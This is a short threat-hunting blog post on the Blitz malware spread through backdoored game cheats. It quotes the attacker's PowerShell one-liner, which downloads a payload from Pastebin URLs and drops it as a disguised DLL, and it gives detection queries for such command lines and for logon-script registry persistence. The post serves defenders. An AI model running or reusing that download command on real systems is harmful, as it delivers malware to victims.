159. Hunting for Backdoored Game Cheats

Hello everyone!

Malware distribution through game cheats isn't a new phenomena, so it's important to be able to detect related activities. Let's look into fresh report by Unit42 on new Windows-based malware called Blitz.

The malware author used social media to distribute Blitz through game cheat packages. The threat actor abused PowerShell to deliver Blitz downloader:

powershell.exe -c \"$ProgressPreference = 'SilentlyContinue';

$p=\\\"$env: LOCALAPPDATA\\Microsoft\\Internet Explorer\\ieapfltr.dll\\\"; $hu='https://pastebin.com/ raw/FSzik5ew'; $du=(irm 'https://pastebin.com/raw/RzLEd17Z');if (Test-Path $p) {$eh=irm $hu;if($eh. Length -eq 64 -and $eh -match '^[a-fA-F0-9]{64}$'){$ah=(Get-FileHash $p -Algorithm SHA256).Hash;if ($eh -ne $ah) {iwr $du -OutFile $p}}}else{iwr $du -OutFile $p}\"

Let's focus on Pastebin and iwr to build our hunting query:

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("pastebin" AND "iwr")

One more thing - persistence mechanism. It's not the most common, so it's a good idea to hunt for registry modifications related to Logon Scripts:

event_type: "registryvaluesetwin"

AND

reg_key_path: "UserInitMprLogonScript"

See you tomorrow!

Comments

Popular posts from this blog

391. Hunting for TeamPCP's Stealer

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

324. Adversaries Use HideMouse to Hide Evidence of Remote Access